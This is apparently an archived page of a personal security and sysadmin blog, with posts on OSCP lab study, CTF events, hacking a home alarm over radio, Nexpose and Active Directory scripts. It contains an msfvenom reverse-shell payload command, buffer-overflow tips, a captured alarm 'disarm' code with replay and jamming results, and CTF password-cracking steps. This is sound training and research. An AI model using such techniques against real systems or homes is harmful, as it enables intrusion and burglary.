- Personal website of Thomas Sluyter

Unimportant background
  RSS feed

About me

Blog archives















> Weblog

> Sysadmin articles

> Maths teaching

Learning more about and thanks to buffer overflows

2017-02-04 09:20:00

I'm very happy that the PWK coursebook includes no less than three prepared buffer overflow exercises to play with. The first literally takes you by the hand and leads you through building the buffer overflow attack step by step. The second (exercise 7.8.1) gives you a Windows daemon to attack and basically tells you "Right! Now do what you just did once more, but without help!" and the third falls kind of in-between while attacking a Linux daemon. Exercise 7.8.1 (vulnserver.exe) is the last one I tackled as it required lab access.

By this time I felt I had an okay grasp of the basics and I had quickly ascertained the limits within which I would have to complete my work. Things ended up taking a lot more time though, because I have a shaky understanding of the output sizing displayed by MSFVenom. For example:

root@kali:# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -b "\x00" -f c
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of c file: 1500 bytes

I kept looking at the "final size" line, expecting that to be the amount that I needed to pack away inside the buffer. That led me down a rabbit hole of searching for the smallest possible payload (e.g. "cmd/windows/adduser") and trying to use that. Turns out that I should not look at the "final size" line, but simply at the "payload size" value. Man, 7.8.1 is so much easier now! Because yes, just about any decent payload does fit inside the buffer part before the EIP value. 

That just leaves you with the task of grabbing a pointer towards the start of the buffer. ESP is often used, but at the point of the exploit it points towards the end of the buffer. Not a problem though, right? Just throw a little math at it! Using "nasm_shell" I found the biggest subtraction (hint: it's not 1000 like in the image) I could make without introducing NULL characters into the buffer and just combined a bunch of'm to throw ESP backwards. After that, things work just fine. 

Learning points that I should look into: tags: , , ,

View or add comments (curr. 0)

PWK Labs: the first host falls

2017-01-29 20:41:00

Hotline Miami 2 logo

I thought I'd get a quick start on doing recon on the PWK labs. Using various enumeration and scanning techniques I've so far found 46 of the 50 hosts I expect to be in the public network. Beyond that, we'll see. For now, I wanted to get started on at least one box. One stood out:, which was found to have no less than ten open services. That looks promising!

It was a lot of fun, exploring that box! What started with a simple credentials issue, led me down the rabbit hole of multi-application LFI. Where I got within inches of the goal using my own approach I did not manage to leap that final hurdle. Some more research led me to an alternative approach of the same category, which flawlessly led to a shell. After that, the host was rife with configuration issues that led to privesc. 

Onwards! I need to dig deeper into this box, to see what more I can find :) tags: , , , ,

View or add comments (curr. 1)

PWK Labs lead times? Not today!

2017-01-27 12:28:00

Having finished 90% of my PWK exercises, it's time to get into the online labs! The final 10% of the exercises need lab access and I need a Windows VM with valid SLMail license. The OffSec website warns that usually there's a two to three week lead time on your lab access requests. Well apparently not today! I received an email at 12:27 that my lab access will start at 13:30 today. Ace! tags: , ,

View or add comments (curr. 0)

OSCP and PWK studies: progress

2017-01-24 21:16:00

It's been a few weeks since I took the PWK (Pentesting With Kali Linux) course at TSTC in Veenendaal. After a short break, I've gone over the whole course book a second time. On the one hand to keep the materials fresh in my head, but also to go over all of the exercises a second time. By making a proper report of all the exercises, it's possible to qualify for 5 bonus points on the OSCP exam. On a minimum score of 70 points, that's a pretty big deal!

I'm currently busting my head on chapter 8, on Linux buffer overflows, which wasn't handled in class. I'm fine on the general concepts and execution, but I'm running afoul a conflict between the 64-bit EDB debugger and the 32-bit application used as an example. Things aren't playing 100% nice, with an unexpected segfault currently getting in my way. 

After this, it's time to start my lab time. I've finished all the coursework as far as possible without using the labs, but now that can't be postponed anymore. tags: ,

View or add comments (curr. 0)

Offensive Security PWK - CTF

2016-12-16 12:37:00

Faraday Security pentest

So far I'm loving OffSec's live classroom PWK course (Pen-Testing with Kali Linux), mostly because it actually requires quite some effort while your there. No slouching in your seats, but axe-to-the-grindwheel hands-on work. But last night was a toughy! As part of the five day course, the Thursday evening offers an additional CTF where all students can take part in attacking a simulated company. 

The initial setup is quite similar to the events which I'd experience at Ultimum and at KPMG: the contestants were divided into teams and were given VPN login details. In this case, the VPN connection led us straight into the target company's DMZ, of which we were given a basic sketch. A handful of servers were shown, as well as a number of routers/firewalls leading into SCADA and backoffice networks. As usual, the challenge was to own as many systems as possible and to delve as deeply into the network as you could. 

Let me tell you, practicing coursework is something completely different from trying the real deal. Here we are, with 32 hours of practice under our belt and all of a sudden we're spoilt for choice. Two dozen target hosts with all manner of OSes and software. In the end my team concluded that it was so much that it'd left our heads spinning and that we should have focused on a small number of targets instead of going wide. 

Our initial approach was very nice: get together as a group, quickly introduce eachother and then form pairs. With a team of 8-10 people, working individually leads to a huge mess. Working in pairs, not only would we have two brains on one problem, but that would also leave more room for open communication. We spent the first 45 minutes on getting our VPN connections working and on recon, each pair using a different strategy. All results were the poured into Faraday on my laptop, whose dashboard was accessible to our team mates through the browser. I've been using Faraday pretty extensively during the PWK course and I'm seriously considering using it on future assignments!

After three grueling hours our team came in second, having owned only one box and having scored minor flags on other hosts. I'm grateful that the OffSec team went over a few of the targets today, taking about 30min each to discuss the approach needed to tackle each host. Very educational and the approaches were all across the board :) tags: , , , ,

View or add comments (curr. 0)

Continued RF hacking of a home alarm system

2016-10-21 10:57:00

Continuing where I left off last time (replay attack using a remote), I wanted to see how easy it would be to mess with the sensors attached to the Kerui home alarm system that I'm assessing. 

For starters, I assumed that each sensor would use the same HS1527 with a different set of data sent for various states. At least in the case of the magnet sensors, that assumption was correct. The bitstreams generated by one of the contacts are as follows:

As I proved last time, replaying any of these codes is trivial using an Arduino or similar equipment. Possible use cases for miscreants could include:

  1. Trick the alarm into thinking an open door is closed, before the alarm gets armed. That way the home owner does not get alerted about leaving something open when leaving the home. 
  2. Trick the alarm into thinking a window opened, after the alarm gets armed. Do this often enough, a few nights a week, and the home owner will get fed up with the alarm and just disable it. 

Going one step further I was wondering whether the simple 433Mhz transmitter for my Arduino would be capable of drowning out the professionally made magnet contacts. By using Suat Özgür's RC-Switch library again, I set the transmitter to continuously transmit a stream of ones. Basically, just shouting "AAAAAAAAAHHHHH!!!!!" down the 433MHz band.

Works like a charm, as you can see in the video below. Without the transmitter going, the panel hears the magnet contact just fine. Turning on the transmitter drowns out any of the signals sent by the contact. tags: , ,

View or add comments (curr. 0)

First steps in hardware hacking

2016-10-05 08:23:00

Having come a long way in the RF-part of my current security project, I decided to dive into the hardware part of my research. The past few weeks have been spent with a loupe, my trusty multimeter, a soldering iron and some interesting hardware!

Cracking the shell of the Kerui G19 shows a pretty nice PCB! All ICs and components are on the backside, the front being dedicated to the buttons and the business end of the LCD panel. Opening the lid on the back immediately shows what look like unterminated service pins (two sets of'm), which is promising. 

What's less promising, is that the main IC is completely unmarked. That makes identifying the processor very hard, until I can take a crack at the actual firmware. My initial guess was that it's some ARM7 derivative, because the central panel mostly acts like a dressed-down feature phone with Android. A few weeks later that guess feels very, very off and it's most likely something much simpler. As user PedroDaGr8 mentioned on my Reddit thread about the PCB:

"Most people would assume an ARM in this case. In reality, it might be ARM, PIC, AVR, MIPS, FPGA, CPLD, H78, etc. Any of these could fulfill this role and function. It often depends on what the programmer or programming team is familiar with. I have seen some designs from China before, that used a WAY OVERKILL Analog Devices Blackfin DSP processor as the core. Why? Because it was cheaper to use the guys they had that were proficient at programming in Blackfin than to hire new guys for this one product."

So until I can analyse the firmware, the CPU could be just about anything! :D

There are many great guides online, on the basics of hardware hacking, like DevTTYs0's "Reverse engineering serial ports" or Black Hills Security's "We can hardware hack, and you can too!". Feeling confident in their teachings I took to those service pins with my multimeter. Sadly, both rows of pins had an amount of pins that's not consistent with UART consoles but I didn't let that discourage me. Based on the measured voltages I hooked up my PL2303 UART-to-USB, to see if I could find anything useful. 

No dice. Multiple pins provided output onto my Picocom console, often with interspersed Chinese unicode characters. But no pins would react to input and the output didn't look anything like a running OS or logging. 

Between the lack of identification on the CPU and the lack of clear UART ports, it was time for hard work! I took a page from the book of Joffrey Czarny & Raphaël Rigo ("Reverse engineering hardware for software reversers", slide 11) and started mapping out all the components and traces on the PCB. Instead of using their "hobo method" with GIMP, I one-upped things by using the vector editor InkScape. My first few hours of work resulted in what you see above: a mapping of both sides of the PCB and the interconnections of most of the pins. 

Thus I learned a few things:

  1. Damn! There's at least one hidden layer of traces on the inside of the PCB. I have deduced the existence of a number of connections that cannot be visually confirmed, only by measuring resistance. 
  2. The service headers under the backside lid are connected to both the CPU (CN11 and CN3) with CN3 probably having served to flash the firmware into the EN25-F80 EEPROM.

Status for now: lots of rewarding work and I have a great SVG to show for it. And I've gotten to know my Arduino and PL2303 a bit better. But I haven't found anything that helps me identify an OS or a console port yet. I'll keep at it!! tags: , ,

View or add comments (curr. 0)

First steps in RF hacking

2016-09-20 18:05:00

The first part of my current project that I wanted to tackle, was the "RF hacking" part: capturing, analyzing, modifying and replaying the radio signals sent and received by a hardware device.

Home alarm systems (or home automation systems in general) often used one of two RF bands: 433MHz or 868Mhz. As far as I understand it, 433MHz is often used by lower end or cheaper systems; haven't figured out why just yet. In the case of the Kerui G19 alarm, the adverts from the get-go tell you it uses 433MHz for its communications.

Cracking open one of the remotes I find one basic IC in there, the HS1527 (datasheet). The datasheet calls it an "OTP encoder", but I haven't figured out what OTP stands for in this case. I know "OTP" as "One Time Password" and that's also what the datasheet hints at ("HS1527 hai a maximum of 20 bits providing up to 1 million codes.It can reduce any code collision and unauthorized code scanning possibilities.") but can't be that because the Kerui remotes send out the exact same code every time. has a short discussion on the HS1527, calling it a "learning code" as opposed to a "fixed code" (e.g. PT2262), but the only difference I see is 'security through obscurity', because it simply provides a large address space. There is no OTP going on here!

The datasheet does provide useful information on how its bit patterns are generated and what they look like on the output. The four buttons on the remote are tied 1:1 to the K0 through K3 inputs, so even if HS1527 can generate 16 unique codes, the remote will only make four unless you're really fast. 

After that I spent a lot of time reading various resources on RF sniffing and on 433MHz communications. Stuff like LeetUpload's articles, this article on Random Nerd, and of course lots of information at Great Scott Gadgets. Based on my reading, I put together a nice shopping list:

And cue more learning! 

GQRX turns out to be quite user-friendly and while hard to master, isn't too hard to get a start with. It's even included with the Kali Linux distribution! Using GQRX I quickly confirmed that the remotes and control panel do indeed communicate around the 433MHz band, with the panel being at a slighly higher frequency than the remotes. With some tweaking and poking, I found the remote to use AM modulation without resorting to any odd trickery.

GQRX dilligently gave me a WAV file that can be easily inspected in Audacity. Inspecting the WAV files indicated that each button-press on the remote would send out multiple repeats of the same bitstream. Zooming into the individual bitstreams you can make out the various patterns in the signal, but I'd had problem matching it to the HS1527 datasheet for the longest of times. For starters, I never saw a preamble, I counted 25 bits instead of 20+4 (address+data) and the last 4 bits showed patterns that should only occur when >1 button was pressed. 

Then it hit me: that 25th bit is the preamble! The preamble is sent back-to-back with the preceding bitstream. Doh!

Just by looking at the GQRX capture in Audacity, I can tell that the address of this particular remote is 10000100001100110001 and that 0010 is the data used for the "disarm" signal. 

Time for the next part of this experiment; let's break out the Arduino! Again, the Arduino IDE turns out to be part of the Kali Linux distro! Awesome! Some Googling led me to Suat Özgür's RC-Switch library, which comes with a set of exemplary programs that work out-of-the-box with the 433Mhz transceivers I bought. 

Using the receiver and sniffing the "disarm" signal confirms my earlier findings:

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 9228,864,320,272,916,268,920,272,912,276,908,872,308,284,904,280,904,280,912,276,904,872,320,868,312,280,908,276,912,868,312,876,324,276,900,276,908,280,908,876,312,280,908,280,904,880,312,276,908,

Decimal: 8663826 (24Bit) Binary: 100001000011001100010010 Tri-State: not applicable PulseLength: 297 microseconds Protocol: 1

Raw data: 14424,76,316,280,904,288,896,280,904,20,1432,36,1104,36,912,280,904,284,900,280,908,876,312,872,308,280,908,88,272,120,928,128,756,24,224,20,572,44,1012,32,800,24,188,32,964,68,1008,44,856,

The bitstream matches what I saw in Audacity. Using Suat's online parsing tool renders an image very similar to what we saw before.

So, what happens if we plug that same bitstream into the basic transmission program from RC-Switch? Let me show you!

If the YouTube clip doesn't show up: I press the "arm" button on the alarm system, while the Arduino in the backgrouns is sending out two "disarm" signals every 20 seconds. 

To sum it up: the Kerui G19 alarm system is 100% vulnerable to very simple replay attacks. If I were to install this system in my home, then I would never use the remote controls and I would de-register any remote that's tied to the system. tags: , ,

View or add comments (curr. 0)

New project: security assessment of a home security system

2016-08-24 20:58:00

(C) Kerui Secrui

Recently I've been seeing more and more adverts pop up for "cheap" and user-friendly home alarm systems from China. Obviously you're going to find them on Alibaba and MiniInTheBox, but western companies are also offering these systems and sometimes at elevated prices and with their own re-branding. Most of these systems are advertised as a set of a central panel, with GSM or Wifi connection, a set of sensors and a handful of remotes.

Between the apparent popularity of these systems and my own interest in further securing our home, I've been wanting to perform a security assessment of one of these Chinese home security systems. After suggesting the project to my employer, Unixerius happily footed the bill on such a kit, plus a whole bunch of extra lovely hardware to aid in the testing! 

For my first round of testing, I grabbed a Kerui G19 set from AliExpres

I'm tackling this assessment as a learning experience as I have no prior experience in most of the areas that I'll be attacking. I plan of having a go at the following:

The last item on the list is the only one I'm actually familiar with. The rest? Well, I'm looking forward to the challenge!

Has research like this been done before? Absolutely, I'm being far from original! One great read was Bored Hacker's "How we broke into your home". But I don't mind, as it's a great experience for me :) tags: , ,

View or add comments (curr. 0)

Passed my CEH and took part in a CTF

2016-07-05 20:10:00

Today was a day well spent!

This morning I passed my CEH examination in under 45 minutes. Bam-bam-bam, answers hammered out with time to spare for coffee on my way to Amstelveen. A few weeks back I'd started this course expecting some level of technical depth, but in the end I've concluded that CEH makes a nice entry-level course for managers or juniors in IT. One of my colleagues in the SOC had already warned me about that ;) I still had lots of fun with my fellow IT Gilde members, playing around during the evening-time classes set up in cooperation with TSTC.

Why go to Amstelveen? Because it's home to KPMG's beautiful offices, which is where I would take part in a CTF event co-organized by CQure! This special event served as a trial-run for a new service that KPMG will be offering to companies: CTF as a training event. Roughly twenty visitors were split across four teams, each tackling the same challenge in a dedicated VM environment. My team consisted mostly of pen-testing newbies, but we managed to make nice headway by working together and by coordinating our efforts through a whiteboard. 

This CTF was a traditional one, where the players are assumed to be attacking a company's infrastructure. All contestants were given VPN configuration data, in order to connect into the gaming environment. KPMG took things very seriously and had set up separate environments for each team, so we could have free reign over our targets. The introductory brief provided some details about the target, with regards to their web address and the specific data we were to retrieve. 

As I mentioned, our room was pretty distinct insofar that we were 90% newbies. Thus our efforts mostly consisted of reconnaissance and identifying methods of ingress. I won't go into details of the scenario, as KPMG intends to (re)use this scenario for other teams, but I can tell you that they're pretty nicely put together. They include scripts or bots that simulate end-user behaviour, with regards to email and browser usage. 

CQure and KPMG have already announced their follow-up to this year's CTF, which will be held in April of 2017. They've left me with a great impression and I'd love to take part in their next event! tags: , , , ,

View or add comments (curr. 0)

Building the BoKS Puppet module

2016-04-20 20:35:00

Yesterday I published the BoKS Puppet module on Puppet Forge! So far I've sunk sixty hours into making a functional PoC, which installs and configures a properly running BoKS client. I would like to thank Mark Lambiase for offering me the chance to work on this project as a research consultant for FoxT. I'd also like to thank Ger Apeldoorn for his coaching and Ken Deschene for sparring with me. 

BoKS Puppet module at the Forge.

In case anyone is curious about my own build process for the Puppet module, I've kept a detailed journal over the past few months which has now been published as a paper on our website -> Building the BoKS Puppet module.pdf

I'm very curious about your thoughts on it all. I reckon it'll make clear that I went into this project with only limited experience, learning as I went :) tags: , ,

View or add comments (curr. 0)

A very productive week: BoKS, Puppet and security

2016-04-17 00:28:00

I have had a wonderfully productive week! Next to my daily gig at $CLIENT, I have rebuilt my burner laptop with Kali 2016 (after the recent CTF event) and I have put eight hours into the BoKS Puppet module I'm building for Fox Technologies.  

The latter has been a great learning experience, building on the training that Ger Apeldoorn gave me last year. I've had a few successes this week, by migrating the module to Hiera and by resolving a concurrency issue I was having.

With regards to running Kali 2016 on the Lenovo s21e? I've learned that the ISO for Kali 2016 does not include the old installer application in the live environment. Thus it was impossible to boot from a USB live environment to install Kali on /dev/mmcblk1pX. Instead, I opted to reinstall Kali 2, after which I performed an "apt-get dist-upgrade" to upgrade to Kali 2016. Worked very well once I put that puzzle together. tags: , ,

View or add comments (curr. 0)

CTF036 security event in Almere

2016-04-01 19:01:00

My notes from CTF036

A few weeks ago Almere-local consulting firm Ultimum posted on LinkedIn about their upcoming capture the flag event CTF036. Having had my first taste of CTF at last fall's PvIB event, I was eager to jump in again! 

The morning's three lectures were awesome!

The afternoon's CTF provided the following case (summarized): "De Kiespijn Praktijk is a healthcare provider whom you are hired to attack. Your goal is to grab as many of their medical record identifiers as you can. Based on an email that you intercepted you know that they have 5 externally hosted servers, 2 of which are accessible through the Internet. They also have wifi at their offices, with Windows PCs." The maximum score would be achieved by grabbing 24 records, for 240 points. 

I didn't have any illusions of scoring any points at all, because I still don't have any PenTesting experience. For starters, I decided to start reconnaissance through two paths: the Internet and the wifi. 

As you can see from my notes it was easy to find the DKP-WIFI-D (as I was on the D-block) MAC address, for use with Reaver to crack the wifi password. Unfortunately my burner laptop lacks both the processing power and a properly sniffing wlan adapter, so I couldn't get in that way. 

I was luckier going at their servers:

  1. Sanne's home directory, which actually contained a text file with "important patients". BAM! Three medical records!!
  2. The /etc/shadow file had an easily crackable password for user Henk. Unfortunately that username+password did not let me access the .15 server through SSH or Webmin.
  3. Sanne has a mailbox! In /home/vmail I found her mailbox and it was receiving email! I used the Drupal site's password recovery to access her Drupal account. 

I didn't find anything using Sanne's account on the Drupal site. But boy was I wrong! 16:00 had come and gone, when my neighbor informed me that I simply should have added q=admin to Sanne's session's URL. Her admin section would have given me access to six more patient records! Six! 

Today was a well-spent day! My first time using Metasploit! My first time trying WPA2 hacking! Putting together a great puzzle to get more and more access :) Thanks Ultimum! I'm very much looking forward to next year's CTF! tags: , , , ,

View or add comments (curr. 0)

Passed my NACA examination

2016-03-16 08:02:00

NACA logo

With many thanks to Nexpose consultant Mark Doyle for his trust in me and his coaching and with thanks to my colleagues at $CLIENT for offering me the chance to learn something new!

This morning I passed my NACA (Nexpose Advanced Certified Administrator) examination, with an 85% score.

While preparing for the exam I searched online to find stories of test takers, describing their experiences with the NCA and NACA exams. Unfortunately I couldn't really find any, aside from one blogpost from 2012. 

For starters, the exam will be taken through Rapid7's ExpertTracks portal. If you're going to take their test, you might as well register beforehand. Purchasing the voucher through their website proved to be interesting: I ran into a few bugs which prevented my order from being properly processed. With the help of Rapid7's training department, things were sorted out in a few days and I got my voucher.

The examination site is nice enough, though there are two features that I missed while taking the test:

  1. There is no option to mark your questions for review, a feature most computer-based exams provide.
  2. Even if you could mark your questions, there apparently is no index page that allows you to quickly jump to specific questions. 

I made do with a notepad (to mark the questions) and by editing the URL in the address bar, to access the questions I wanted to review. 

The exam covers 75 questions, is "open book" and you're allowed to take 120 minutes. I finished in 44 minutes, with an 85% score (80% needed to pass). None of the questions struck me as badly worded, which is great! No apparent "traps" set out to trick you. tags: , ,

View or add comments (curr. 2)

Running Jira locally on Mac OS X

2016-03-10 19:39:00

Jira on OS X

It's no secret that I'm a staunch lover of Atlassian's Jira, a project and workload management tool for DevOps (or agile) teams. I was introduced to Jira at my previous client and I've introduced it myself at $CURRENTCLIENT. The ease with which we can outline all of our work and divide it among the team is wonderful and despite not actually using "scrum", we still reap plenty of benefits!

Unfortunately I couldn't get an official Jira project setup on $CUSTOMER's servers, so instead I opted for a local install on my Macbook. Sure, it foregoes a lot of the teamwork benefits that Jira offers, but at least it's something. Besides, this way I can use Jira for two of my other projects as well! 

Getting Jira up and running with a standalone installation on my Mac took a bit of fiddling. Even Atlassian's own instructions were far from bullet proof.

Here's what I did:

  1. Download the OS X installer for Jira. It comes as a .tgz.
  2. Extract the installer wherever you'd like; I even kept it in ~/Downloads for the time being.
  3. Make a separate folder for Jira's contents, like ~/Documents/Jira.
  4. Ensure that you have Java 8 installed on your Mac. Get it from Oracle's website.
  5. Browse to the unpacked Jira folder and find the script "". You'll need to change one line so it reads as follows, otherwise Jira won't boot: "$_RUNJAVA" -version 2>&1 | grep "java version" | (
  6. Find the files "" and "" and add the following lines at their top:
export PATH="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home/bin:$PATH"
export JAVA_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JRE_HOME="/Library/Internet Plug-Ins/JavaAppletPlugin.plugin/Contents/Home"
export JIRA_HOME="/Users/thomas/Documents/Jira"

You should now be able to startup Jira, from the Terminal, by running the "" script. The best thing is that Jira handles the sleep mode a laptop just fine (at least it does so on OS X), so you can safely forget about your Terminal session and close it. I've had Jira run for days on end, with many sleeps and resumes each day!

Upgrading Jira should be as easy as downloading the latest archive (step 1) and then repeating steps 5 and 6 on the files from the new installation. All Jira data lives outside of the installation path, thanks to step 3.

EDIT: If you ever need to move your Jira data directory elsewhere (or rename it), then you'll need to re-adjust the setting of JIRA_HOME in the shell scripts. You will also need to change the database path in dbconfig.xml (which lives inside your Jira data directory). tags: , ,

View or add comments (curr. 0)

Using the Nexpose API in Linux shell scripts to bulk-create users

2016-03-02 15:09:00

The past few weeks I've spent at $CLIENT, working on their Nexpose virtual appliances. Nexpose is Rapid7's automated vulnerability scanning tool, which may also be used in unison with Rapid7's more famous product: Metasploit. It's a pretty nice tool, but it certainly needs some work to get it all up and running in a large, corporate environment.

One of the more practical aspects of our setup, is the creation of user accounts in Nexpose's web interface. Usually, you'd have to click a few times and enter a bunch of textfields for each user. This gets boring for larger groups of users, especially if you have more than one Security Console host. To make our lives just a little easier, we have at least setup the hosts to authenticate against AD.

I've fiddled around with Nexpose's API this afternoon, and after a lot of learning and trying ("Van proberen ga je het leren!" as I always tell my daughter) I've gotten things to work very nicely! I now have a basic Linux shell script (bash, but should also work in ksh) that creates user accounts in the Nexpose GUI for you!

Below is a small PoC, which should be easily adjusted to suit your own needs. Enjoy!


# In order to make API calls to Nexpose, we need to setup a session.
# A successful login returns the following:
# <LoginResponse success="1" session-id="F7377393AEC8877942E321FBDD9782C872BA8AE3"/>
NexposeLogin() {
        echo -e "\n===================================="
        echo -e "\n===================================="
        echo -e "Admin username: \c"; read NXUSER
        echo -e "Admin password: \c"; read NXPASS
        LOGIN="<LoginRequest synch-id='0' password='${NXPASS}' user-id='${NXUSER}'></LoginRequest>"
        export NXSESSION=$(echo "${LOGIN}" | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $4}')
# Now that we have a session, we can make new users.
#    You will need to know the ID number for the desired authenticator.
# You can get this with: <UserAuthenticatorListingRequest session-id='...'/>
#    A user request takes the following shape, based on the API v1.1 docu.
#  <UserSaveRequest session-id='...'>
#  <UserConfig id="-1" role-name="user" authsrcid="9" authModule="LDAP" name="apitest2"
#   fullname="Test van de API" administrator="0" enabled="1">
#  </UserConfig>
#  </UserSaveRequest>
# On success, this returns:
#  <UserSaveResponse success="1" id="41">
# </UserSaveResponse>
NexposeCreateUser() {
        NXAUTHENTICATOR="9" # You must figure this out from Nexpose, see above
        SCRATCHFILE="/tmp/$(basename ${0}).temp"
        echo "<UserSaveRequest session-id='${NXSESSION}'>" > ${SCRATCHFILE}
        echo "<UserConfig id='-1' role-name='${NXROLE}' authsrcid='${NXAUTHENTICATOR}' authModule='LDAP' name='${NEWUSER}' fullname='${NEWUSER}' administrator='0' enabled='1'>" >> ${SCRATCHFILE}
        echo "</UserConfig>" >> ${SCRATCHFILE}
        echo "</UserSaveRequest>" >> ${SCRATCHFILE}
        SUCCESS=$(cat ${SCRATCHFILE} | curl -s -k -H "Content-Type:text/xml" -d @- ${URI} | head -1 | awk -F\" '{print $2}')
        [[ ${SUCCESS} -eq 0 ]] && logger ERROR "Failed to create Nexpose user ${NEWUSER}."
        rm ${SCRATCHFILE}
NexposeCreateUser apitest1 tags: , ,

View or add comments (curr. 0)

Changing users' passwords in Active Directory 2016, from anywhere

2016-01-04 09:28:00

As part of an ongoing research project I'm working on, I've had the need to update an end-users' password in Microsoft's Active Directory. Not from Windows, not through "ADUC" (AD Users and Computers), but from literally anywhere. Thankfully I stumbled upon this very handy lesson from the University of Birmingham. 

I've tweaked their exemplary script a little bit, which results in the script shown at the bottom of this post. Using said script as a proof of concept I was able to show that the old-fashioned way of using LDAP to update a user's password in AD will still work on Windows Server 2016 (as that's the target server I run AD on). 


Called as follows:

$ php encodePwd.php user='Pippi Langstrumpf' newpw=Bora38Sr > Pippi.ldif

Resulting LDIF file:

$ cat Pippi.ldif 
dn: CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl
changetype: modify
replace: unicodePwd

Imported as follows:

$ ldapmodify -f Pippi.ldif -H ldaps:// -D 'CN=Administrator,CN=Users,DC=broehaha,DC=nl' -W
Enter LDAP Password: 
modifying entry "CN=Pippi Langstrumpf,CN=Users,DC=broehaha,DC=nl"

Once the ldapmodify has completed, I can login to my Windows Server 2016 host with Pippi's newly set password "Bora38Sr".



function EncodePwd($pw) {
  $newpw = '';
  $pw = "\"" . $pw . "\"";
  $len = strlen($pw);
  for ($i = 0; $i < $len; $i++)
      $newpw .= "{$pw{$i}}\000";
  $newpw = base64_encode($newpw);
  return $newpw;

 if($argc > 1) {
	foreach($argv as $arg)  {
	list($argname, $argval) = split("=",$arg);
	$$argname = $argval;

  $userdn = 'CN='.$user.',CN=Users,DC=broehaha,DC=nl';

  $newpw64 = EncodePwd($newpw);

dn: $userdn
changetype: modify
replace: unicodePwd
unicodePwd:: $newpw64


?> tags: , ,

View or add comments (curr. 0)

Integrating BoKS and Windows Active Directory

2015-12-18 10:59:00

As part of an ongoing research project for Fox Technologies I had a need for a private Windows Active Directory server. Having never built a Windows server, let alone a domain controller, it's been a wonderful learning experience. The following paragraphs outline the process I used to build a Windows AD KDC and how I set up the initlal connections from the BoKS hosts.


Windows server setup

I run all my tests using the Parallels Desktop virtualization product. The first screenshot below will show five hosts running concurrently on my Macbook Air: a Windows Server 2012 host and four hosts running RHEL6 (BoKS master, replica and two clients). 

Even installing Windows Server 2012 proved to be a hassle, insofar that the .ISO image provided by Microsoft (for evaluation purposes) appears to be corrupt. Every single attempt to install resulted in error code 0x80070570 halfway through. This is a known issue and the only current workaround appears to lie in using an alternative ISO image provided by a good samaritan. Of course, one ought to be leery about using installation software not provided by the actual vendor, so caveat emptor

Once the installation has completed, setup basic networking as desired. Along the way I opted to disable IPv6 as this would make the setup and troubleshooting of Kerberos a bit more complicated. 

Next up, it's time to add the appropriate Roles to the new Windows server. This is done through Windows Server Manager, from the "Manage" menu one should pick "Add roles and features". Add:

This tutorial by Rackspace quickly details how to setup the Domain Services. In my case I set up the forest "" which matches the name of the domain (and my LDAP directory on Linux). Setting up the CA (certificate authority) requires stepping through a wizard, using the default values provided. 

BoKS will also require the installation of the (deprecated) role Identity Manager for Unix. Microsoft provide excellent instructions on how to install these features on Windows 2012, through the command line. In short, the commands are (NOTE the disabling of NIS):

Dism.exe /online /enable-feature /featurename:adminui /all
Dism.exe /online /disable-feature /featurename:nis /all Dism.exe /online /enable-feature /featurename:psync /all


The Windows AD KDC should be in sync with the time as running on the Linux hosts. Setup NTP to use the same NTP servers as follows:

w32tm /config / /syncfromflags:MANUAL
Stop-Service w32time
Start-Service w32time


Export the root CA certicate by running:

certutil -ca.cert windows_ca.crt >windows_ca.txt
certutil -encode windows_ca.crt windows_ca.cer


You may now SCP the windows_ca.cer file to the various Linux hosts (for example by using pscp, from the Putty team). 

Now it's time to put some data into DNS and Active Directory. Using the "AD Users and Computers" tool, create Computer records for all BoKS hosts. These records will not automatically include the full DNS names, as these will be filled at a later point in time. Using the DNS tool, create a forward lookup zone for your domain ( in my case) as well as a reverse lookup zone for your IP range (10.211.55.* for me). In the forward zone create A records for your Windows and your Linux hosts (the wizard can automatically create the reverse PTR records). See below screenshots for some examples.



Linux / BoKS server setup

My Linux hosts were already installed before, as part of my BoKS testing environment. All hosts run RHEL6 and BoKS 7.0. The master server has Apache and OpenLDAP running for my Yubikey testing environment

First order of business is to ensure that the Linux hosts all use the Windows DNS server. Best way to arrange this is to ensure that /etc/sysconfig/network-scripts/ifcfg-eth0 (adjust for the relevant interface name) has entries for the DNS server and search domains. In my case it's as follows, with DNS2 being my default DNS for everything outside of my testing environment):



As was said, NTP should be running to have time synchronization among all servers involved.

Your Kerberos configuration file should be adjusted to match your AD domain:

 default = FILE:/var/log/krb5libs.log
 kdc = FILE:/var/log/krb5kdc.log
 admin_server = FILE:/var/log/kadmind.log

 dns_lookup_realm = true
 dns_lookup_kdc = true
 ticket_lifetime = 24h
 renew_lifetime = 7d

 default_realm = BROEHAHA.NL
 forwardable = true
  kdc =
  admin_server =

[domain_realm] = BROEHAHA.NL


If so desired you may test the root CA certificate from the Windows server, after which the certificate may be installed:

openssl x509 -in /home/thomas/windows_ca.cer -subject -issuer -purpose
cp /home/thomas/windows_ca.cer /etc/openldap/cacerts/
cacertdir_rehash /etc/openldap/cacerts


You should be able to test basic access to AD as follows:

ldapsearch -v -x -H ldaps:// -D "CN=Administrator,CN=Users,DC=BROEHAHA,DC=NL" -b "DC=BROEHAHA,DC=NL" -W
ldapsearch -vv -Y GSSAPI -H ldap:// -b "DC=BROEHAHA,DC=NL"


Now you may join your Linux host(s) to the Windows AD domain:

kinit bokssync@BROEHAHA.NL Password for bokssync@BROEHAHA.NL:
adjoin join -K BROEHAHA.NL Administrator@BROEHAHA.NL


If you now use "AD Users and Computers" on the Windows server, you'll notice that the fully qualified DNS name of the Linux host has been filled in. 

Basic AD connectivity has now been achieved. We'll start putting it to good use in an upcoming tutorial. tags: , ,

View or add comments (curr. 0)

In-between assignments? What an opportunity!

2015-11-23 14:38:00

It's been two weeks now since I've left my friends and colleagues at my previous assignment. I didn't have a new gig lined up, so for now I'm "in-between assignments". Am I having a dreary time and am I scrambling for something new? Maybe surprisingly, I'm not! I've been busier than ever!

I'd argue that some downtime between jobs is an excellent opportunity! 

  1. Learn something new
  2. Meet new people
  3. Deflate


Learn something new

